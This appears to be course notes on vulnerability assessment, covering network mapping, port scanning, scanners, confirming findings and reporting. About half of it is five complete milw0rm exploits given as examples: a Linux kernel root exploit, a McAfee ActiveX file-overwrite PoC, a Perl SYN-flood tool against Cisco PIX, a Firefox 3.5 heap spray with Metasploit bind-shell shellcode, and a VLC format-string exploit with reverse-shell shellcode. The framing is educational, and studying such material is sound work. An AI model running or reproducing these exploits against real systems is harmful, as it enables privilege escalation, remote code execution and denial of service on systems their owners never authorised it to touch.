Vulnerability Assessment: A vulnerability Assessment is the process of

identifying, quantifying, and prioritizing (ranking) the vulnerabilities in a system.

The discipline of vulnerability assessment comprises host-based vulnerability
assessment, related to the inside configuration of a host, and network-based
vulnerability assessment, focused on the vulnerabilities visible and exploitable on
the network.

Both kinds of vulnerability assessment are required for

maximum effectiveness, as vulnerabilities can be exploited by an entity inside the
security perimeter (i.e.a legitimate user), or initiated from outside the perimeter,
by an unauthorised or illegitimate user.

Remote vs local attacks:

Why we need VA ?
 To create a healthy Network.
 To prevent outside (unauthorised) user.
 To be Hack proof
 To create a secure software
What all can be Vulnerable ?

 OS (Operating System)

 AV (Antivirus)

 Firewall

 Browsers

 Applications (Desktop/Web-Based)
Example(OS)
/***********************************************************
* hoagie_udp_sendmsg.c
* LOCAL LINUX KERNEL ROOT EXPLOIT (< 2.6.19) - CVE-2009-2698
*
* udp_sendmsg bug exploit via (*output) callback function
* used in dst_entry / rtable
*
* Bug reported by Tavis Ormandy and Julien Tinnes
* of the Google Security Team
*
* Tested with Debian Etch (r0)
*
* $ cat /etc/debian_version
* 4.0
* $ uname -a
* Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686
GNU/Linux
* $ gcc hoagie_udp_sendmsg.c -o hoagie_udp_sendmsg
* $ ./hoagie_udp_sendmsg
* hoagie_udp_sendmsg.c - linux root < 2.6.19 local
* -andi / void.at
*
* sh-3.1# id
* uid=0(root) gid=0(root)
Gruppen=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(
andi)
* sh-3.1#
*
* THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-
* CONCEPT. THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY
* DAMAGE DONE USING THIS PROGRAM.
*
* VOID.AT Security
* andi@void.at
* http://www.void.at
*
************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/mman.h>

/**
* this code will be called from NF_HOOK via (*output) callback in kernel mode
*/
void set_current_task_uids_gids_to_zero() {
asm("push %eax\n"
"movl $0xffffe000, %eax\n"
"andl %esp, %eax\n"
"movl (%eax), %eax\n"
 "movl $0x0, 0x150(%eax)\n"
"movl $0x0, 0x154(%eax)\n"
"movl $0x0, 0x158(%eax)\n"
"movl $0x0, 0x15a(%eax)\n"
"movl $0x0, 0x160(%eax)\n"
"movl $0x0, 0x164(%eax)\n"
"movl $0x0, 0x168(%eax)\n"
"movl $0x0, 0x16a(%eax)\n"
"pop %eax\n");
}

int main(int argc, char **argv) {

int s;
struct msghdr header;
struct sockaddr_in sin;
char *rtable = NULL;

fprintf(stderr,
"hoagie_udp_sendmsg.c - linux root <= 2.6.19 local\n"
"-andi / void.at\n\n");

s = socket(PF_INET, SOCK_DGRAM, 0);

if (s == -1) {
fprintf(stderr, "[*] can't create socket\n");
exit(-1);
}

/**
* initialize required variables
*/
memset(&header, 0, sizeof(struct msghdr));
memset(&sin, 0, sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr("127.0.0.1");
sin.sin_port = htons(22);
header.msg_name = &sin;
header.msg_namelen = sizeof(sin);

/**
* and this is the trick:
* we can use (*output)(struct sk_buff*) from dst_entry (used by rtable) as
a callback (=> offset 0x74)
* so we map our rtable buffer at offset 0 and set output callback function
*
* struct dst_entry
* {
* struct dst_entry *next;
* atomic_t __refcnt; client references
* int __use;
* struct dst_entry *child;
* struct net_device *dev;
* short error;
* short obsolete;
* int flags;
* #define DST_HOST 1
* #define DST_NOXFRM 2
* #define DST_NOPOLICY 4
 * #define DST_NOHASH 8
* #define DST_BALANCED 0x10
* unsigned long lastuse;
* unsigned long expires;
*
* unsigned short header_len; * more space at head
required *
* unsigned short trailer_len; * space to reserve at
tail *
*
* u32 metrics[RTAX_MAX];
* struct dst_entry *path;
*
* unsigned long rate_last; * rate limiting for ICMP
*
* unsigned long rate_tokens;
*
* struct neighbour *neighbour;
* struct hh_cache *hh;
* struct xfrm_state *xfrm;
*
* int (*input)(struct sk_buff*);
* int (*output)(struct sk_buff*);
*
* #ifdef CONFIG_NET_CLS_ROUTE
* __u32 tclassid;
* #endif
*
* struct dst_ops *ops;
* struct rcu_head rcu_head;
*
* char info[0];
* };
*
* struct rtable
* {
* union
* {
* struct dst_entry dst;
* struct rtable *rt_next;
* } u;
*
* struct in_device *idev;
*
* unsigned rt_flags;
* __u16 rt_type;
* __u16 rt_multipath_alg;
*
* __be32 rt_dst; * Path destination *
* __be32 rt_src; * Path source *
* int rt_iif;
*
* * Info on neighbour *
* __be32 rt_gateway;
*
* * Cache lookup keys *
* struct flowi fl;
 *
* * Miscellaneous cached information *
* __be32 rt_spec_dst; * RFC1122 specific
destination *
* struct inet_peer *peer; * long-living peer info *
* };
*
*/
rtable = mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED |
MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (rtable == MAP_FAILED) {
fprintf(stderr, "[*] mmap failed\n");
exit(-1);
}
*(int *)(rtable + 0x74) = (int)set_current_task_uids_gids_to_zero;

/* trigger exploit
*
* the second sendmsg() call will call ip_append_data() with rt == NULL
* because of:
* if (up->pending) {
* *
* * There are pending frames.
* * The socket lock must be held while it's corked.
* *
* lock_sock(sk);
* if (likely(up->pending)) {
* if (unlikely(up->pending != AF_INET)) {
* release_sock(sk);
* return -EINVAL;
* }
* goto do_append_data;
* }
* release_sock(sk);
* }
*
*/
sendmsg(s, &header, MSG_MORE|MSG_PROXY);
sendmsg(s, &header, 0);

close(s);

system("/bin/sh");

return 0;
}

// milw0rm.com [2009-09-02]

Example(AV):
GOODFELLAS Security Research TEAM
http://goodfellas.shellcode.com.ar
Greetings to str0ke

McAfee, Inc. 3.6.0.608 Policy Manager naPolicyManager.dll Arbitrary Data Write

==============================================================================

Internal ID: VULWAR20090616.

-----------

Introduction
------------

naPolicyManager.dll is a library included in the Program Mc Afee inc.

Tested In
---------

- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.

Summary
-------

The WriteTaskDataToIniFile method doesn't check if it's being called from the
application or from a malicious user. A Remote Attacker could craft a
html page and overwrite arbitrary files in a system.

Impact
------

The vulnerability could allow malicious users to write arbitrary data on a

vulnerable system that uses this software.

Workaround
----------

- Activate the Kill bit zero in the clsid corresponding to the software.
- Unregister naPolicyManager.dll using regsvr32.

Timeline
--------

July 16 2009 -- Bug Discovery.

July 16 2009 -- POC published.

Credits
-------

* callAX <bemariani@gmail.com>
Technical Details
-----------------

WriteTaskDataToIniFile method receives one argument filename in this format

"c:\path\file".

Proof of Concept
---------------

<HTML>
<BODY>
<object id=ctrl classid="clsid:{04D18721-749F-4140-AEB0-
CAC099CA4741}"></object>
<SCRIPT>
function Do_1t()
{
File = "C:\b00t.ini"
ctrl.WriteTaskDataToIniFile(File)
}
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>

# milw0rm.com [2009-06-16]

Example(Firewall):
# The easy way by logic logidev@gmail.com (line 2) untested /str0ke
# hping -c 1 -S -s 31337 -k -b -p 22 10.0.xx.xxx

#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not
installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP perl module is not
installed \n" if $@;
eval ("use Term::ProgressBar;");
die "[error] Term::ProgressBar perl module is not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions (
"help" =>\$usage,
"device=s" => \$device,
"source=s" =>\$sourceip,
"dest=s"=>\$destip,
"sourcemac=s"=>\$sourcemac,
"destmac=s"=>\$destmac,
"port=n"=> \$tcpport,
);

######################## Config option ####################

my $timeout = "0,1"; # Timeout

if ($usage) {&usage;}

if (!$device) {
$device= 'eth0'; # Network device
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}

if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SET

my $tcpdata = "TEST"; # TCP payload
my $count=0;

######################################################

#Initialize Progres Bar

my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);

if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else {
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}

for ($count=0; $count< 65537 ; $count++) {

$packet->set({

ip => {
saddr => $sourceip,
daddr => $destip
},

tcp => {
check => 0x0010 , # TCP Packet Checksum 0 for auto correct
source => $count,
dest => $tcpport,
syn => $syn,
data => $tcpdata
}});
$packet->ethsend($timeout);
#$packet->send($timeout);

$progress->update($_);
$count++;
}
sub usage {
print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs
and comments to info@arhont.com

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]

[--destmac=MAC] [--port=n]

Options:

--help This message

--device Network interface (defaut set eth0)
--source Victim source IP
--dest Victim destination IP
--sourcemac Victim source MAC
--destmac MAC Address of the gateway
--port TCP port

Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest

192.168.55.111 \
--sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22
EOF

exit shift;
}

# milw0rm.com [2005-11-23]

Example(Browser):
##################################################
# FireFox 3.5 Heap Spray
# Discovered by: Simon Berry-Bryne
# Coded in Perl by netsoul, ALTO PARANA - Paraguay
# Contact: netsoul2 [at] gmail [dot] com
##################################################

#!/usr/bin/perl -w
use strict;
use POE::Component::Server::HTTP;
POE::Component::Server::HTTP->new(Port => my $port = 8080,
ContentHandler => {"/" => sub{$_[1]->push_header("Content-Type",
"text/html"), $_[1]->content(<DATA>)}});

print "[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30

secs try with netcat for connect in port 5500\n";
POE::Kernel->run();

__DATA__
<html>
<head>
<title>Exploiting Firefox 3.5</title>
<script language= javascript>
//windows - shell_bind_tcp - metasploit - encoding is shikata_ga_nai
var shellcode= unescape("%u6afc%u4deb%uf9e8%uffff%u60ff%u6c8b%u2424%u458b
%u8b3c%u057c%u0178%u8bef" +
"%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac
%u74c0%uc107%u0dca" +
"%uc201%uf4eb%u543b%u2824%ue575%u5f8b%u0124%u66eb%u0c8b
%u8b4b%u1c5f%ueb01" +
"%u2c03%u898b%u246c%u611c%u31c3%u64db%u438b
%u8b30%u0c40%u708b%uad1c%u408b" +
"%u5e08%u8e68%u0e4e%u50ec%ud6ff
%u5366%u6866%u3233%u7768%u3273%u545f%ud0ff" +
"%ucb68%ufced%u503b%ud6ff%u895f
%u66e5%ued81%u0208%u6a55%uff02%u68d0%u09d9" +
"%uadf5%uff57%u53d6%u5353%u5353%u5343%u5343%ud0ff
%u6866%u7c15%u5366%ue189" +
"%u6895%u1aa4%uc770%uff57%u6ad6%u5110%uff55%u68d0%uada4%ue92
e%uff57%u53d6" +
"%uff55%u68d0%u49e5%u4986%uff57%u50d6%u5454%uff55%u93d0%ue76
8%uc679%u5779" +
"%ud6ff%uff55%u66d0%u646a%u6866%u6d63%ue589%u506a
%u2959%u89cc%u6ae7%u8944" +
"%u31e2%uf3c0%ufeaa%u2d42%u42fe%u932c%u7a8d%uab38%uabab
%u7268%ub3fe%uff16" +
"%u4475%ud6ff%u575b%u5152%u5151%u016a%u5151%u5155%ud0ff
%uad68%u05d9%u53ce" +
"%ud6ff%uff6a%u37ff%ud0ff%u578b%u83fc%u64c4%ud6ff
%uff52%u68d0%uceef%u60e0" +
"%uff53%uffd6%u41d0");
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()

function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);$poe_kernel
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
 var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}

function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>

# milw0rm.com [2009-07-20]

Example(Application):

/* Epibite // bite since 1442

* pown meme ta mamie
*/

/* Advisory from Luigi Auriemma

* CVE-2007-6682 / format string in VideoLAN VLC 0.8.6d
*
* Description :
* Format string vulnerability in the httpd_FileCallBack
* function (network/httpd.c) in VideoLAN VLC 0.8.6d allows
* remote attackers to execute arbitrary code via format
* string specifiers in the Connection parameter.
*/

/* La faille n'a d'interet que dans un but d'apprentissage

 * d'une technique avance d'exploitation des chaines de
* format.
*
* Toute la difficulte de l'exploitation est liee au fait
* que la chaine de format se trouve dans un thread, et
* la pile remplie avec des adresses du tas.
* On est donc oblige d'utiliser la technique dite de
* "l'ebp chaining".
*
* On pardonnera le manque de proprete et de portabilite,
* defauts qui sont expliques et corriges durant son
* utilisation sur la plateforme de tutoriaux de
* l'Epitech Security Laboratory.
*/

/* Traduction:
* This is ugly and not cross plateform, use it for
* learning purpose. (^-^)
*/

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

#include <netinet/in.h>
#include <arpa/inet.h>

#include <sys/types.h>
#include <sys/socket.h>

int connect_(char *, int);

void exit_(int, char *);
char *get_payload(unsigned short, unsigned short/* , unsigned short * */);
void progressbar(void);
void write_short(unsigned short, unsigned short);

#define REQUEST "GET / HTTP/1.0\r\n" \

"Connection: "

/* Chaining ebp // FREEBSD8 - 0.8.6d :

*
* (0xbf5fa838) -> 0xbf5fafa8 // 12$ httpd_FileCallBack()
* _____________/
* /
* (0xbf5fafa8) -> 0xbf5fafe8 // 488$ httpd_HostThread()
* _____________/
* /
* (0xbf5fafe8) -> 0x00000000 // 504$ pthread_getprio()
*
* (0xbfbee2b8) // (bf5f)e2b8 is an eip value
* because we write short by short,
* we've just have to write (bfbe)
* in order to have the sc addr.
* (0xbf5fa83c) // An eip -> 12$ + 4
*/
#define FIRST_EBP 12
#define SECOND_EBP 488
#define THIRD_EBP 504

#define FBSD8_ESP ( 0xbf5fa808 )

#define FBSD8_SCADDR ( 0xbfbee2b8 )

int port;
char *ip;

/* bsd_ia32_reverse - LHOST=127.0.0.1 LPORT=4321 Size=92 http://metasploit.com

*/
unsigned char scode[] =
"\x33\xc9\x83\xe9\xef\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c"
"\x3c\x56\xcc\x83\xeb\xfc\xe2\xf4\x06\x5d\x0e\x55\x3e\x7e\x04\x8e"
"\x3e\x54\x29\xcc\x6c\x3d\x9b\x4c\x04\x2c\x54\xdc\x8d\xb5\xb7\xa6"
"\x7c\x6d\x06\x9d\xfb\x56\x34\x94\xa1\xbc\x3c\xce\x35\x8c\x0c\x9d"
"\x3b\x6d\x9b\x4c\x25\x45\xa0\x9c\x04\x13\x79\xbf\x04\x54\x79\xae"
"\x05\x52\xdf\x2f\x3c\x68\x05\x9f\xdc\x07\x9b\x4c";

int main(int argc, char **argv)

{
unsigned int i;

if (argc < 3)
(void) exit_(1, "Usage: exploit ip port\n");
ip = argv[1];
port = atoi(argv[2]);
printf("[+] Victim is : %s:%d...\n", ip, port);
printf("[+] Shellcode size : %d // located at : 0x%08x\n",
strlen((char *)scode), FBSD8_SCADDR);
printf("[+] EIP is located at : 0x%08x\n", FBSD8_ESP + FIRST_EBP * 4 + 4 +
2);

(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + 2),

FIRST_EBP);
(void) write_short((unsigned short)(FBSD8_SCADDR >> 16), SECOND_EBP);
(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)),
FIRST_EBP);

for (i = 0; i < strlen((char*)scode); i += 2)

{
(void) write_short((unsigned short)(FBSD8_SCADDR + i), SECOND_EBP);
(void) write_short((unsigned short)(*((unsigned short *)(scode + i))),
THIRD_EBP);
}

(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4) + 2),

FIRST_EBP);
(void) write_short((unsigned short)(FBSD8_ESP >> 16), SECOND_EBP);
(void) write_short((unsigned short)(FBSD8_ESP + (THIRD_EBP * 4)),
FIRST_EBP);
(void) write_short((unsigned short)(FBSD8_ESP + FIRST_EBP * 4 + 4 + 2),
SECOND_EBP);
(void) write_short((unsigned short)(FBSD8_SCADDR >> 16), THIRD_EBP);
 printf("[+] Done.\n");
return (0);
}

char *get_payload(unsigned short data,

unsigned short pop
/* unsigned short *offset */)
{
static char buffer[32];
char buffi[9];

/* data = data - *offset; */

if ((unsigned short)data < 8)
{
memset(buffi, '0', 9);
buffi[data] = '\0';
sprintf(buffer, "%s%%%d$hn", buffi, pop);
}
else
sprintf(buffer, "%%%du%%%d$hn", data, pop);
/* *offset = *offset + data; */
return (buffer);
}

void write_short(unsigned short data, unsigned short pop)

{
char buff[1024];
int ret;
int sock;

memset(buff, '\0', 42);

strcat(buff, REQUEST);
strcat(buff, get_payload(data, pop));
strcat(buff, "\r\n\r\n");
sock = connect_(ip, port);
if (write(sock, buff, strlen(buff)) < (int)strlen(buff))
(void) exit_(1, "[-] write()\n");
while ((ret = read(sock, buff, 1024)))
;
if (close(sock) < 0)
(void) exit_(1, "[-] close()\n");
return ;
}

void exit_(int i, char *tyop)

{
write(2, tyop, strlen(tyop));
(void) exit(i);
}

int connect_(char *ip, int port)

{
int sock;
struct sockaddr_in s;

(void) progressbar();
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
 (void) exit_(1, "[-] socket()\n");
bzero(&s, sizeof(s));
s.sin_family = AF_INET;
s.sin_port = htons(port);
s.sin_addr.s_addr = inet_addr(ip);
if (connect(sock, (struct sockaddr *)&s, sizeof(s)) < 0)
(void) exit_(1, "[-] connect()\n");
return (sock);
}

void progressbar(void)
{
static unsigned int c = 0;

write(1, "D ", 12

- write(1, "[?] 8=====", 5 + ((c >> 2 & 1 ? -1 : 1)
* (++c & 3)
+ (c % 0x20 & 100))));
write(1, "p0wn in progress", 19);
write(1, "...", c / 4 % 4);
write(1, " \r", 4);
return ;
}

// milw0rm.com [2008-04-28]

Anatomy of a network-based vulnerability assessment:

 The purpose of a network-based vulnerability assessment is to compile an

 inventory of systems and services attached to the network and, for each
 system and service, identify the weaknesses and vulnerabilities visible and
 exploitable on the network, also taking advantage of the attacker’s
 techniques. The activity aims at remotely assessing a network by finding
 vulnerabilities on its systems. Results are eventually consolidated in a
report
Steps:

Target acquisition:

 To acquire complete knowledge of the network environment to

analyse,identifying all the alive hosts and network-attached devices
(including network
 equipments, network printers, etc.) residing on the portion of network
under analysis, along with their available services

Selective protection:
 We cannot protect everything (too expensive)
 We are asked to choose what to protect, and how.
 Choice on the basis of our model of classification
Network mapping:
 Many different ways (as testing may be performed under various
constraints and conditions):
 1. Starting from the network topology …. when available ;-)
 2. System-provided tools and information (i.e. ping and traceroute, ICMP
queries, routing tables, DNS interrogation with nslookup, DNS zone
transfers, etc.)
 3. Specific tools (i.e. nmap, fping, pinger, etc.) Theoretically any layer in the
ISO-OSI model can provide useful information. In practice, is carried out
mainly by using ICMP, TCP or UDP protocols,
 combinations of the above protocols, or protocols residing on upper layers.
 • Also referred as IP scanning, host discovery, etc.

Port mapping:
 Port mapping (also known as port scanning) is the process of connecting to
TCP and UDP ports of the target system to determine what ports are in a
 LISTENING state, possibly identifying also the running services.

More specifically:

 1. Identifying the TCP and UDP ports in a LISTENING state;

 2. Identifying the TCP and UDP services running on the target system;
 3. Identifying RPC registered RPC programs running on the target system;
 4. Identifying services unintentionally exposed

An example of port mapping (using nmap)

 • Carried-out with programs known as port mappers or port scanners (i.e.
nmap,
 strobe, netcat)
# nmap -sTU 10.0.1.1
Starting nmap by fyodor@insecure.org (www.insecure.org/nmap/)
Interesting ports on puma.mydomain.com(10.0.1.3):
Port State Service
21/tcp open ftp
23/tcp open telnet
25/tcp open smtp
69/udp open tftp
80/tcp open http
111/tcp open sunrpc
111/udp open sunrpc
177/udp open xdmcp
2049/tcp open nfs
2049/udp open nfs
6000/tcp open X11
Nmap run completed -- 1 IP address (1 host up) scanned in 13 seconds
ports in LISTENING state
expected running service
(IANA numbers)
http://www.iana.org/assignments/port-numbers

Network-based vulnerability scanning programs

Vulnerability scanners take the concept of a port scanner to the next level.
The vulnerability scanner identifies not just hosts and open ports but any
associated
vulnerabilities automatically instead of relying on human interpretation of
the results Automated network-based vulnerability scanning programs
assist in:
1. extracting information from the target hosts (O.S. version, open ports,
active services and
 protocols, version of each running service, exported resources and shares,
valid accounts),
this phase is also referred as enumeration
2. checking all the details against publicly available sources of known
vulnerability information
and vendor security alerts to see if known potential vulnerabilities may
affect the host
3. performing tests and use heuristics to confirm the existence of a real
vulnerability (whenever
possible and according to the level of aggressiveness chosen)
4. rating the risk of the vulnerability
5. mapping each finding to their related security advisory or alert
6. providing fixing direction
7. creating reports

Available programs
 ARC SARA - Security Auditor's Research Assistant
 eEye Digital Security Retina
 BindView
 CyberCop Scanner
 ISS Internet Security Scanner
 ISS Internet Scanner
 Kane Security Analyst
 NA CyberCop Scanner
 Nessus
 Symantec NetRecon
 Saint corporation Saint (formerly WWDSI)
 Satan - Security Administrator Tool for Analyzing Networks
 Vigilante SecureScan NX

… and many others!

Vulnerability confirmation
 Not all potential vulnerabilities will be confirmed as real vulnerabilities
during the tests. Some network-based vulnerability assessment programs
 are able to distinguish between a potential vulnerability and a confirmed
vulnerability.
 Exploit code, often available from public security resources, can be used to
confirm the existence of real vulnerabilities.
 Unstructured and manual activity, typically performed by matching
information from multiple resources.
 Regardless of the success or failure to exploit a potential vulnerability, the
underlying vulnerability may still exist. Potential vulnerabilities should
therefore be treated with the same seriousness as confirmed
vulnerabilities.
 Some manual activity still required for double checking (manual tests, check
the server log, etc.)
 false negatives

Hierarchy of threats
 The question is a little more difficult to answer and takes experience along
with knowing how the threat was carried out. Which factors contribute
more to a website defacement? The Operating System or the type of web
server running on the Operating System?
 We need a hierarchy of threats. Although the threat is still the website
defacement, an attacker could use multiple methods to deface a site. The
threat probability is then a combination of which methods of attack are the
most popular, along with which system configurations are most susceptible
to those popular attacks

Security report
 • Eventually all the findings are to be consolidated in a final security report.
 Different levels of information can be included, depending on the audience:
 technical details, including directions and fix information, for system
 administrators; summaries for security managers; and high-level graph and
trend reports for executives. The aim is twofold: reports are both input for
operative directions and auditing records.
 The value of a vulnerability assessment activity is tied to its ability to assist
in the remediation of the vulnerabilities found, therefore the final report
shouldn’t be just a collection of problems but it must include specific advice
on how to close the vulnerabilities.
The report should describe at least
 1. scope and methodology
 2. detailed findings and directions for improvements, possibly indexed by
risk priority,
 for the technical personnel. Links to vendor advisories
 3. recommendation to avoid the same findings in the future
 4. high level management reports, possibly including historic trends, giving
an overall
 perspective of an organisation’s security posture
 5. general recommendations and conclusions
 • A vulnerability assessment does not last forever, rather the final report is
strictly
 linked to the timeframe when the scan was performed. A vulnerability
 assessment is therefore inherently not exhaustive and the faithfulness of
the
 final report decreases with time.
 • As people operate computers and networks, and people make mistakes,
the
 vulnerability assessment must be a periodic and iterative process.

Good candidates for ethical hacking

 • hacker noun 1. A computer hacker is someone who tries to break into
 computer systems, especially in order to get secret or confidential
 information that is stored there.
 • (Collins COBUILD English dictionary)
 • “Ethical” hackers employ the same tools and techniques as “criminal”
hackers,
 but they would neither damage the target systems nor steal information.
Instead
 they evaluate the target systems’ security and report back to the owners
with
 the vulnerability they found and instructions on how to remedy them.
 • Ethical hackers must be completely trustworthy. While conducting
security tests,
 the ethical hacker may discover information that should remain secret, and
 therefore must be trusted to exercise tight control over any information
about a
 target that could be misused.